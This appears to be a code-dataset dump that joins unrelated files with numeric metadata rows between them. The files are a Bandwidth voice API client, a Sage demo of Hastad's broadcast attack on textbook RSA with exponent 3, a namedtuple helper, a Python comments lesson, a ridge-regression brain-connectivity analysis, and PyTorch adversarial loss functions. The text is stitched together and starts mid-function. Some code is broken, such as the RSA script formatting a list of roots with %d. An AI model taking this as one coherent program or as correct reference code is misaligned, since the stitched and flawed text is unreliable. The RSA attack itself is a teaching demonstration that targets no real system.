    failures = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if response.status_code in failures:
        error_cls, message = failures[response.status_code]
        raise error_cls(message, response)
    self.validate_response(response)

    # Deserialize the JSON body into ConferenceRecordingMetadata models.
    payload = APIHelper.json_deserialize(response.text, ConferenceRecordingMetadata.from_dictionary)
    return ApiResponse(response, body=payload)
def get_conference_recording(self,
                             account_id,
                             conference_id,
                             recording_id):
    """GET /api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings/{recordingId}.

    Returns metadata for the specified recording.

    Args:
        account_id (string): Account that owns the conference.
        conference_id (string): Conference the recording belongs to.
        recording_id (string): Recording to look up.

    Returns:
        ApiResponse: Wrapper around the HTTP response whose body is the
            payload deserialized via CallRecordingMetadata.from_dictionary.

    Raises:
        APIException: When the remote API answers with an error status
            code; the exception carries the message and the response.
    """
    # Expand the path template with all three identifiers.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings/{recordingId}',
        {
            'accountId': {'value': account_id, 'encode': False},
            'conferenceId': {'value': conference_id, 'encode': False},
            'recordingId': {'value': recording_id, 'encode': False},
        }
    )
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)

    # Build, authenticate and send the GET request.
    request = self.config.http_client.get(
        url, headers={'accept': 'application/json'})
    VoiceBasicAuth.apply(self.config, request)
    response = self.execute_request(request)

    # Map error status codes onto the exceptions callers expect.
    failures = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if response.status_code in failures:
        error_cls, message = failures[response.status_code]
        raise error_cls(message, response)
    self.validate_response(response)

    # Deserialize the JSON body into a CallRecordingMetadata model object.
    payload = APIHelper.json_deserialize(response.text, CallRecordingMetadata.from_dictionary)
    return ApiResponse(response, body=payload)
def get_download_conference_recording(self,
                                      account_id,
                                      conference_id,
                                      recording_id):
    """Does a GET request to /api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings/{recordingId}/media.

    Downloads the specified recording.

    Args:
        account_id (string): Account that owns the conference.
        conference_id (string): Conference the recording belongs to.
        recording_id (string): Recording whose media is downloaded.

    Returns:
        ApiResponse: An object with the response value as well as other
            useful information such as status codes and headers. The body
            is the JSON-deserialized payload, or None when the response
            carried no body.

    Raises:
        APIException: When an error occurs while fetching the data from
            the remote API. This exception includes the HTTP Response
            code, an error message, and the HTTP body that was received in
            the request.
    """
    # Prepare query URL
    _url_path = '/api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings/{recordingId}/media'
    _url_path = APIHelper.append_url_with_template_parameters(_url_path, {
        'accountId': {'value': account_id, 'encode': False},
        'conferenceId': {'value': conference_id, 'encode': False},
        'recordingId': {'value': recording_id, 'encode': False}
    })
    _query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
    _query_builder += _url_path
    _query_url = APIHelper.clean_url(_query_builder)
    # Prepare headers
    _headers = {
        'accept': 'application/json'
    }
    # Prepare and execute request
    _request = self.config.http_client.get(_query_url, headers=_headers)
    VoiceBasicAuth.apply(self.config, _request)
    _response = self.execute_request(_request)
    # Endpoint and global error handling using HTTP status codes.
    if _response.status_code == 400:
        raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
    elif _response.status_code == 401:
        raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
    elif _response.status_code == 403:
        raise ApiErrorException('User unauthorized to perform this action.', _response)
    elif _response.status_code == 404:
        raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
    elif _response.status_code == 415:
        raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
    elif _response.status_code == 429:
        raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
    elif _response.status_code == 500:
        raise ApiErrorException('Something unexpected happened. Please try again.', _response)
    self.validate_response(_response)
    # BUG FIX: the original guard
    #     if (_response.text is not None) or (not str(_response.text)):
    # skipped the assignment when the body was None, leaving `decoded`
    # unbound (UnboundLocalError on the next line), and it attempted to
    # JSON-decode empty-string bodies. Decode only a non-empty body and
    # fall back to None otherwise.
    decoded = APIHelper.json_deserialize(_response.text) if _response.text else None
    return ApiResponse(_response, body=decoded)
def get_query_call_recordings(self,
                              account_id,
                              mfrom=None,
                              to=None,
                              min_start_time=None,
                              max_start_time=None):
    """GET /api/v2/accounts/{accountId}/recordings.

    Returns a list of metadata for the recordings associated with the
    specified account. The list can be filtered by the optional from,
    to, minStartTime, and maxStartTime arguments. The list is capped at
    1000 entries and may be empty if no recordings match the specified
    criteria.

    Args:
        account_id (string): Account whose recordings are listed.
        mfrom (string, optional): Value for the 'from' query parameter.
        to (string, optional): Value for the 'to' query parameter.
        min_start_time (string, optional): Value for 'minStartTime'.
        max_start_time (string, optional): Value for 'maxStartTime'.

    Returns:
        ApiResponse: Wrapper around the HTTP response whose body is the
            payload deserialized via CallRecordingMetadata.from_dictionary.

    Raises:
        APIException: When the remote API answers with an error status
            code; the exception carries the message and the response.
    """
    # Expand the path template, then attach the filter query parameters.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/recordings',
        {'accountId': {'value': account_id, 'encode': False}}
    )
    url = APIHelper.append_url_with_query_parameters(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path,
        {
            'from': mfrom,
            'to': to,
            'minStartTime': min_start_time,
            'maxStartTime': max_start_time,
        }
    )

    # Build, authenticate and send the GET request.
    request = self.config.http_client.get(
        APIHelper.clean_url(url), headers={'accept': 'application/json'})
    VoiceBasicAuth.apply(self.config, request)
    response = self.execute_request(request)

    # Map error status codes onto the exceptions callers expect.
    failures = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if response.status_code in failures:
        error_cls, message = failures[response.status_code]
        raise error_cls(message, response)
    self.validate_response(response)

    # Deserialize the JSON body into CallRecordingMetadata model objects.
    payload = APIHelper.json_deserialize(response.text, CallRecordingMetadata.from_dictionary)
    return ApiResponse(response, body=payload)
| 50.941741
| 160
| 0.639296
| 8,120
| 74,324
| 5.661946
| 0.036084
| 0.045068
| 0.057945
| 0.071822
| 0.951452
| 0.945057
| 0.941533
| 0.937401
| 0.930332
| 0.927569
| 0
| 0.009584
| 0.288211
| 74,324
| 1,458
| 161
| 50.97668
| 0.85946
| 0.248749
| 0
| 0.873724
| 1
| 0.015306
| 0.17242
| 0.02569
| 0
| 0
| 0
| 0.044582
| 0
| 1
| 0.028061
| false
| 0
| 0.017857
| 0
| 0.07398
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5b869b2740110d1f4732d6377ca1ce7a264ea295
| 4,652
|
py
|
Python
|
attacks/hastad_broadcast_1.sage.py
|
HimadriP/RSA_attacks
|
db58478a33f0dffe492b9a626bf0a4a055682690
|
[
"MIT"
] | null | null | null |
attacks/hastad_broadcast_1.sage.py
|
HimadriP/RSA_attacks
|
db58478a33f0dffe492b9a626bf0a4a055682690
|
[
"MIT"
] | null | null | null |
attacks/hastad_broadcast_1.sage.py
|
HimadriP/RSA_attacks
|
db58478a33f0dffe492b9a626bf0a4a055682690
|
[
"MIT"
] | null | null | null |
# This file was *autogenerated* from the file hastad_broadcast_1.sage
from sage.all_cmdline import * # import sage library
_sage_const_3 = Integer(3); _sage_const_1 = Integer(1); _sage_const_0 = Integer(0); _sage_const_6463622691511358246253843530346957637373771131900115657628956890377133584685693433311356736502535188960628243319843637208561654754340837455923813904935726098046519705940214576082103284466503159415461203969573801791920631195293206011011844763565055300642230449750811779501261575835745322674349086755143 = Integer(6463622691511358246253843530346957637373771131900115657628956890377133584685693433311356736502535188960628243319843637208561654754340837455923813904935726098046519705940214576082103284466503159415461203969573801791920631195293206011011844763565055300642230449750811779501261575835745322674349086755143); _sage_const_4904210278926969382082557520192836447620667943738476959012915263821924765704042320598156081670263969687760089856706802802004650936382508871994891329330913843525685058082515207132945533244603569727806893994293885384278666942443580662358108073773755355586360506572438622134010593933877119286516365700963 = Integer(4904210278926969382082557520192836447620667943738476959012915263821924765704042320598156081670263969687760089856706802802004650936382508871994891329330913843525685058082515207132945533244603569727806893994293885384278666942443580662358108073773755355586360506572438622134010593933877119286516365700963); _sage_const_8510037142847030608778231217636478160093221085470322047695805385472839268389474788835516797851509710116067378544281194029549685630115441064125513663237564088997109745111221590482125652917053055227873501767060274190671556099364882664979774616818879661100982508212710118592283619809629333761875639670531 = Integer(8510037142847030608778231217636478160093221085470322047695805385472839268389474788835516797851509710116067378544281194029549685630115441064125513663237564088997109745111221590482125652917053055227873501767060274190671556099364882664979774616818879661100982508212710118592283619809629333761875639670531); _sage_const_16 = Integer(16)
from sage.all import *
import sys
# Accumulator for validation error messages; only appended to by the
# (currently commented-out) sanity checks below, so it is unused at runtime.
errors=[]
def chinese_remainder(n, a):
    """Solve the simultaneous congruences x = a[i] (mod n[i]).

    Args:
        n: list of pairwise-coprime moduli.
        a: list of residues, one per modulus.

    Returns:
        The unique solution modulo the product of the moduli.
    """
    # BUG FIX: the original returned CRT_list([c1,c2,c3],[n1,n2,n3])
    # built from module-level globals, silently ignoring both parameters.
    # Delegate to Sage's CRT solver, whose signature is
    # CRT_list(values, moduli).
    return CRT_list(a, n)
def ex_euc_alg(a,b):
    """Extended Euclidean algorithm.

    Returns a tuple (g, x, y) such that g = gcd(a, b) and a*x + b*y = g.
    """
    # Base case: gcd(0, b) = b with Bezout coefficients (0, 1).
    if a==_sage_const_0 :
        return (b,_sage_const_0 ,_sage_const_1 )
    # Recurse on (b mod a, a) and back-substitute the coefficients.
    gcd_val, coeff_x, coeff_y = ex_euc_alg(b % a, a)
    return (gcd_val, coeff_y - (b // a) * coeff_x, coeff_x)
def mul_inv(a, b):
    """Return the multiplicative inverse of a modulo b.

    Raises:
        ValueError: if gcd(a, b) != 1, i.e. no inverse exists.
    """
    g, x, _ = ex_euc_alg(a, b)
    if g != _sage_const_1 :
        # BUG FIX: the original implicitly returned None here, which would
        # surface later as a confusing TypeError at the call site; fail
        # loudly instead.
        raise ValueError("%s is not invertible modulo %s" % (a, b))
    return x % b
n1=_sage_const_6463622691511358246253843530346957637373771131900115657628956890377133584685693433311356736502535188960628243319843637208561654754340837455923813904935726098046519705940214576082103284466503159415461203969573801791920631195293206011011844763565055300642230449750811779501261575835745322674349086755143
e1=_sage_const_3
n2=_sage_const_8510037142847030608778231217636478160093221085470322047695805385472839268389474788835516797851509710116067378544281194029549685630115441064125513663237564088997109745111221590482125652917053055227873501767060274190671556099364882664979774616818879661100982508212710118592283619809629333761875639670531
e2=_sage_const_3
n3=_sage_const_4904210278926969382082557520192836447620667943738476959012915263821924765704042320598156081670263969687760089856706802802004650936382508871994891329330913843525685058082515207132945533244603569727806893994293885384278666942443580662358108073773755355586360506572438622134010593933877119286516365700963
e3=_sage_const_3
# if(e1!=e2 or e2!=e3):
# globals()['errors'].append("e values are not the same")
e=e1
m = raw_input("Enter string: ")
m=int(m.encode("hex"),_sage_const_16 )
c1 = pow(m,e1,n1)
c2 = pow(m,e2,n2)
c3 = pow(m,e3,n3)
# if(gcd(n1,n2)!=1 or gcd(n2,n3)!=1 or gcd(n1,n3)!=1):
# globals()['errors'].append("The three public moduli are not coprime. Hence hastad attack not possible")
#As gcd(n1,n2,n3)=1 and m^3 < n1*n2*n3, CRT can be applied to find m^3
#m_cubed=chinese_remainder([c1,c2,c3],[n1,n2,n3])
# print "M^3 is ",m_cubed
m_cubed = CRT_list([c1,c2,c3],[n1,n2,n3])
f=x**_sage_const_3 -m_cubed
roots=f.roots(multiplicities=False,ring=IntegerRing())
# print "The message is ",roots[0]
#if(len(roots) == 0):
# globals()['errors'].append('No solution found')
print "The message is %d" % roots
# if __name__ == '__main__':
# a=simple_hastad()
# print a
| 58.15
| 1,996
| 0.846948
| 366
| 4,652
| 10.505464
| 0.306011
| 0.044473
| 0.013004
| 0.006242
| 0.023927
| 0.019246
| 0.009883
| 0.009883
| 0
| 0
| 0
| 0.65493
| 0.084265
| 4,652
| 79
| 1,997
| 58.886076
| 0.247653
| 0.176053
| 0
| 0
| 1
| 0
| 0.008931
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.090909
| null | null | 0.030303
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
34671c189f2f13c48b0e1f4b5b8437df40354825
| 166
|
py
|
Python
|
testing/auto_namedtuple.py
|
KindDragon/all-repos
|
88f50d7bf10247bb14dd82b6f8b18957b2a9941d
|
[
"MIT"
] | null | null | null |
testing/auto_namedtuple.py
|
KindDragon/all-repos
|
88f50d7bf10247bb14dd82b6f8b18957b2a9941d
|
[
"MIT"
] | null | null | null |
testing/auto_namedtuple.py
|
KindDragon/all-repos
|
88f50d7bf10247bb14dd82b6f8b18957b2a9941d
|
[
"MIT"
] | 1
|
2022-03-31T04:09:55.000Z
|
2022-03-31T04:09:55.000Z
|
from __future__ import annotations
import collections
def auto_namedtuple(**kwargs):
    """Build a namedtuple type named 'auto_namedtuple' whose fields are the
    given keyword names, and return an instance populated with their values."""
    field_names = tuple(kwargs)
    nt_cls = collections.namedtuple('auto_namedtuple', field_names)
    return nt_cls(**kwargs)
| 20.75
| 77
| 0.789157
| 18
| 166
| 6.944444
| 0.611111
| 0.224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108434
| 166
| 7
| 78
| 23.714286
| 0.844595
| 0
| 0
| 0
| 0
| 0
| 0.090361
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
3476826678c953f5a3e432636bd9fc6f7fd49ae1
| 21,683
|
py
|
Python
|
In_Prep_Manuscripts/GFC_Anxiety_2019_PBS/scripts/analysis/RidgeRegression_iFGconnections_GFC.py
|
Telzer-DSNLab/Project-NeuroTeen
|
0ef67d8a902682e8f482b07b0f89dcfc21247b41
|
[
"BSD-3-Clause"
] | null | null | null |
In_Prep_Manuscripts/GFC_Anxiety_2019_PBS/scripts/analysis/RidgeRegression_iFGconnections_GFC.py
|
Telzer-DSNLab/Project-NeuroTeen
|
0ef67d8a902682e8f482b07b0f89dcfc21247b41
|
[
"BSD-3-Clause"
] | null | null | null |
In_Prep_Manuscripts/GFC_Anxiety_2019_PBS/scripts/analysis/RidgeRegression_iFGconnections_GFC.py
|
Telzer-DSNLab/Project-NeuroTeen
|
0ef67d8a902682e8f482b07b0f89dcfc21247b41
|
[
"BSD-3-Clause"
] | null | null | null |
#import libraries
import nibabel as nib
import numpy as np
import pylab as pl
from scipy import stats
import scipy
import os
import pandas as pd
import csv
from sklearn import linear_model #for regression analysis
from sklearn.metrics import mean_squared_error, r2_score
from sklearn.model_selection import KFold

path_data='/Users/paulsharp/Documents/Dissertation_studies/data'
os.chdir(path_data)
master_csv=[['Substance_of_Correlation','Wave','Pearson_Corr','Spearman_Corr']]

#Get self-report data in vectors
self_report_data=pd.read_csv('Self_report_full_data_all_timepoints_and_gender.csv')
anxious_apprehension_w1=self_report_data.anxious_app_w1.values
anxious_apprehension_w2=self_report_data.anxious_app_w2.values
anxious_apprehension_longitudinal=self_report_data.anxious_apprehension_change.values
anxious_arousal_w1=self_report_data.anxious_arousal_w1.values
anxious_arousal_w2=self_report_data.anxious_arousal_w2.values
anxious_arousal_longitudinal=self_report_data.anxious_arousal_change.values


def _load_connectome(csv_name):
    """Load one iFG connectivity CSV: drop the leading ID column and
    mean-impute missing cells column-wise. Returns a numpy array."""
    data = pd.read_csv(csv_name, header=None)
    data = data.drop([0], axis=1)
    data = data.fillna(data.mean())  # convert NAN to Mean via imputation
    return data.values


#Get all ifg GFC data
Left_ifg_w1 = _load_connectome('LEFT_ifg_connectivity_wave1.csv')
Left_ifg_w2 = _load_connectome('LEFT_ifg_connectivity_wave2.csv')
Left_ifg_longitudinal = _load_connectome('LEFT_ifg_connectivity_longitudinal.csv')
Right_ifg_w1 = _load_connectome('RIGHT_ifg_connectivity_wave1.csv')
Right_ifg_w2 = _load_connectome('RIGHT_ifg_connectivity_wave2.csv')
Right_ifg_longitudinal = _load_connectome('RIGHT_ifg_connectivity_longitudinal.csv')

n_folds=8
kf=KFold(n_splits=8)

####################################################################
## Implement Nested cross validation
####################################################################
# Import linear model and run
# Also produce summary statistics and save in arrays
# Also implement nested cross-validation for hyperparameter estimates


def _ridge_cv_analysis(X, y, fold_msg, result_msg):
    """Run the 8-fold outer CV with a nested RidgeCV alpha search on each
    training split, print per-fold R^2 (fold_msg), the chosen alphas, and the
    pooled out-of-fold summary statistics (result_msg).

    Returns (CorrPear, CorrSp): the Pearson and Spearman results comparing
    pooled out-of-fold predictions against the observed scores.
    """
    y_predict = np.zeros((n_folds, 13))  # rows=n_iterations, col=test_size
    y_truth = np.zeros((n_folds, 13))
    coefs = np.zeros((n_folds, 258))
    hparam = np.zeros((n_folds, 1))
    for counter, (train, test) in enumerate(kf.split(X, y)):
        Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01, 10, 0.1))
        Ridge_cv.fit(X[train], y[train])
        # RidgeCV performs the nested CV on the training split only (NESTED)
        print(fold_msg.format(Ridge_cv.score(X[train], y[train])))
        hparam[counter, 0] = Ridge_cv.alpha_
        y_predict[counter, :] = Ridge_cv.predict(X[test])
        y_truth[counter, :] = y[test]
        coefs[counter, :] = Ridge_cv.coef_
    print(hparam)
    # NOTE(review): the reshape assumes len(y) == n_folds * 13 (104 subjects)
    # exactly -- confirm against the input CSVs.
    flat_pred = np.reshape(y_predict, len(y))
    flat_truth = np.reshape(y_truth, len(y))
    MSE = mean_squared_error(flat_pred, flat_truth)
    CorrSp = scipy.stats.spearmanr(flat_pred, flat_truth)
    CorrTau = scipy.stats.kendalltau(flat_pred, flat_truth)
    CorrPear = scipy.stats.pearsonr(flat_pred, flat_truth)
    print(result_msg.format(MSE, CorrSp, CorrTau, CorrPear))
    return CorrPear, CorrSp


# One entry per analysis: (X, y, per-fold message, summary message,
# CSV label, CSV wave). Message strings are kept byte-identical to the
# original script so console output is unchanged.
_ANALYSES = [
    (Left_ifg_w1, anxious_apprehension_w1,
     'R^2 of Ridge= {}',
     'Left ifg to Anx App Wave 1 MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Left ifg with Anx App', 1),
    (Left_ifg_w2, anxious_apprehension_w2,
     'WAVE 2 R^2 of Ridge= {}',
     'Left ifg to Anx App WAVE 2 MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Left ifg with Anx App', 2),
    (Right_ifg_w1, anxious_apprehension_w1,
     'WAVE 1 R^2 of Ridge= {}',
     'RIGHT ifg to anx app WAVE 1 MSE :{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Right ifg with Anx App', 1),
    (Right_ifg_w2, anxious_apprehension_w2,
     'WAVE 2 R^2 of Ridge= {}',
     'Right ifg to Anx App WAVE 2 MSE RIGHT:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Right ifg with Anx App', 2),
    (Left_ifg_longitudinal, anxious_apprehension_longitudinal,
     'R^2 of Ridge= {}',
     'Left Longitdinal MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Left ifg-Diff with Anx App change', 'longitudinal'),
    (Right_ifg_longitudinal, anxious_apprehension_longitudinal,
     'R^2 of Ridge= {}',
     'RIGHT Long MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Right ifg-Diff with Anx App change', 'longitudinal'),
    (Left_ifg_w1, anxious_arousal_w1,
     'R^2 of Ridge= {}',
     'Left ifg to Anx Arousal Wave 1 MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Left ifg with Anx Arousal', 1),
    (Left_ifg_w2, anxious_arousal_w2,
     'WAVE 2 R^2 of Ridge= {}',
     'Left ifg to Anx Arousal WAVE 2 MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Left ifg with Anx Arousal', 2),
    (Right_ifg_w1, anxious_arousal_w1,
     'WAVE 1 R^2 of Ridge= {}',
     'RIGHT ifg to anx app WAVE 1 MSE :{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Right ifg with Anx Arousal', 1),
    (Right_ifg_w2, anxious_arousal_w2,
     'WAVE 2 R^2 of Ridge= {}',
     'Right ifg to WAVE 2 MSE RIGHT:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Right ifg with Anx Arousal', 2),
    (Left_ifg_longitudinal, anxious_arousal_longitudinal,
     'R^2 of Ridge= {}',
     'Left Longitdinal MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Left ifg-Diff with Anx Arousal change', 'longitudinal'),
    (Right_ifg_longitudinal, anxious_arousal_longitudinal,
     'R^2 of Ridge= {}',
     'RIGHT Long MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n',
     'Right ifg-Diff with Anx Arousal change', 'longitudinal'),
]

for X, y, fold_msg, result_msg, csv_label, csv_wave in _ANALYSES:
    CorrPear, CorrSp = _ridge_cv_analysis(X, y, fold_msg, result_msg)
    master_csv.append([csv_label, csv_wave, CorrPear, CorrSp])

# Append-mode: repeated runs accumulate rows in the results file (as before).
with open('RESULTS_ifg_DataDriven.csv','a') as f:
    writer=csv.writer(f)
    writer.writerows(master_csv)
| 51.62619
| 174
| 0.791818
| 3,425
| 21,683
| 4.747153
| 0.048759
| 0.05314
| 0.059044
| 0.038379
| 0.943785
| 0.929085
| 0.929085
| 0.924596
| 0.920598
| 0.920598
| 0
| 0.020206
| 0.066458
| 21,683
| 419
| 175
| 51.749403
| 0.783025
| 0.067841
| 0
| 0.707006
| 0
| 0.025478
| 0.098418
| 0.017767
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035032
| 0
| 0.035032
| 0.11465
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cab07f6c7c72b566795281062a0169a4b1feee19
| 242
|
py
|
Python
|
Chapter_2/Comments/Comments.py
|
random-forest-ai/python_course
|
cd6b7f30e1932312c05178e6bb66cc95c72fe6c1
|
[
"MIT"
] | null | null | null |
Chapter_2/Comments/Comments.py
|
random-forest-ai/python_course
|
cd6b7f30e1932312c05178e6bb66cc95c72fe6c1
|
[
"MIT"
] | null | null | null |
Chapter_2/Comments/Comments.py
|
random-forest-ai/python_course
|
cd6b7f30e1932312c05178e6bb66cc95c72fe6c1
|
[
"MIT"
] | null | null | null |
if __name__ == '__main__':
    # Hash-prefixed lines are single-line comments.
    # Each commented line needs its own leading '#'.
    '''
    This is a line printing Hello World
    This is a second line comment
    '''
    print("Hello World")  # an inline (trailing) comment
| 22
| 44
| 0.632231
| 36
| 242
| 4.027778
| 0.361111
| 0.206897
| 0.241379
| 0.331034
| 0.848276
| 0.731034
| 0.731034
| 0.731034
| 0.731034
| 0.731034
| 0
| 0
| 0.293388
| 242
| 10
| 45
| 24.2
| 0.847953
| 0.342975
| 0
| 0
| 0
| 0
| 0.279412
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
cac8e43ae44fc61f8485e6d0d9765ce4cec8c192
| 5,392
|
py
|
Python
|
loss/adversarial_loss_gen.py
|
himashi92/vizviva_brats_2021
|
7b7c5d157a98bf9d1a96c3ca2633aad6c2132475
|
[
"MIT"
] | 2
|
2022-02-14T15:40:49.000Z
|
2022-02-27T02:29:39.000Z
|
loss/adversarial_loss_gen.py
|
himashi92/vizviva_brats_2021
|
7b7c5d157a98bf9d1a96c3ca2633aad6c2132475
|
[
"MIT"
] | 2
|
2022-03-06T10:54:24.000Z
|
2022-03-26T06:45:21.000Z
|
loss/adversarial_loss_gen.py
|
himashi92/vizviva_brats_2021
|
7b7c5d157a98bf9d1a96c3ca2633aad6c2132475
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn

# Shared binary cross-entropy criterion; inputs must already lie in [0, 1].
CE = nn.BCELoss()


def _mean_channel_bce(critic_segs, target):
    """Average the BCE of the critic's first three channel maps against target.

    critic_segs: 5-D tensor (batch, channel, D, H, W); channels 0..2 scored.
    target: tensor matching one channel map's shape (all-zeros = "fake",
    all-ones = "real").
    """
    return (CE(critic_segs[:, 0, :, :, :], target)
            + CE(critic_segs[:, 1, :, :, :], target)
            + CE(critic_segs[:, 2, :, :, :], target)) / 3


def adv_loss_gen_v1(critic_segs_1, critic_segs_2, label):
    """Generator adversarial loss over two critic outputs, both scored
    against the 'fake' (all-zeros) target.

    Note: zeros_like already places the target on label's device/dtype; the
    original's discarded `.cuda()` calls were no-ops and are removed, as is
    the unused `target_real` tensor.
    """
    target_fake = torch.zeros_like(label[:, 1, :, :, :])
    return (_mean_channel_bce(critic_segs_1, target_fake)
            + _mean_channel_bce(critic_segs_2, target_fake))


def adv_loss_gen(critic_segs_1, critic_segs_2, critic_segs_3, critic_segs_4, label):
    """Generator adversarial loss over four critic outputs, all scored
    against the 'fake' (all-zeros) target."""
    target_fake = torch.zeros_like(label[:, 1, :, :, :])
    return (_mean_channel_bce(critic_segs_1, target_fake)
            + _mean_channel_bce(critic_segs_2, target_fake)
            + _mean_channel_bce(critic_segs_3, target_fake)
            + _mean_channel_bce(critic_segs_4, target_fake))


def adv_loss_critic_v1(critic_segs_1, critic_segs_3, label):
    """Critic adversarial loss: critic_segs_1 (generated) pushed toward
    'fake' (zeros), critic_segs_3 (ground truth) toward 'real' (ones)."""
    ref = label[:, 1, :, :, :]
    return (_mean_channel_bce(critic_segs_1, torch.zeros_like(ref))
            + _mean_channel_bce(critic_segs_3, torch.ones_like(ref)))


def adv_loss_critic(critic_segs_1, critic_segs_2, critic_segs_3, critic_segs_4, label):
    """Critic adversarial loss over four outputs: segs_1/segs_2 (generated)
    scored against 'fake' (zeros), segs_3/segs_4 (real) against 'real' (ones)."""
    ref = label[:, 1, :, :, :]
    target_fake = torch.zeros_like(ref)
    target_real = torch.ones_like(ref)
    return (_mean_channel_bce(critic_segs_1, target_fake)
            + _mean_channel_bce(critic_segs_2, target_fake)
            + _mean_channel_bce(critic_segs_3, target_real)
            + _mean_channel_bce(critic_segs_4, target_real))
| 44.933333
| 129
| 0.580675
| 820
| 5,392
| 3.25
| 0.037805
| 0.450281
| 0.165103
| 0.117073
| 0.977111
| 0.977111
| 0.949343
| 0.881426
| 0.881426
| 0.881426
| 0
| 0.083934
| 0.279674
| 5,392
| 120
| 130
| 44.933333
| 0.602214
| 0
| 0
| 0.862069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045977
| false
| 0
| 0.022989
| 0
| 0.114943
| 0
| 0
| 0
| 0
